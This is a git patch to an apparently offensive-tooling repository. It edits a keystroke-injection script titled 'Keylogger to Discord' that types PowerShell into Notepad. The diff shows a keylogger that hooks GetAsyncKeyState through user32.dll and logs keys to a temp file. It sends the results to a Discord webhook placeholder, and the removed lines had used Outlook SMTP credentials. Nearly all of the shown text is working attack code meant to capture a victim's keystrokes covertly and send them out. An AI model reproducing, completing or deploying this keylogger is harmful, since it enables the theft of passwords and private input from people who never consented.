From 107e236e0e2cff0cddec9974ad2fc907d5e5879b Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 29 May 2023 22:02:39 +0000 Subject: [PATCH] Update Keylogger to Discord.txt --- OSINT/Keylogger to Discord.txt | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/OSINT/Keylogger to Discord.txt b/OSINT/Keylogger to Discord.txt index d5fe68b..a33a1e9 100644 --- a/OSINT/Keylogger to Discord.txt +++ b/OSINT/Keylogger to Discord.txt @@ -17,11 +17,9 @@ DELAY 500 STRING notepad ENTER DELAY 2500 -STRING Do{$whuri = "WEBHOOK_HERE";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt" +STRING Do{$whuri = "WEBHOOK_HERE";$RunTime = 1;$TimesRun = 1;$getT = Get-Date ENTER -STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force) -ENTER -STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' +STRING $end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' ENTER STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); ENTER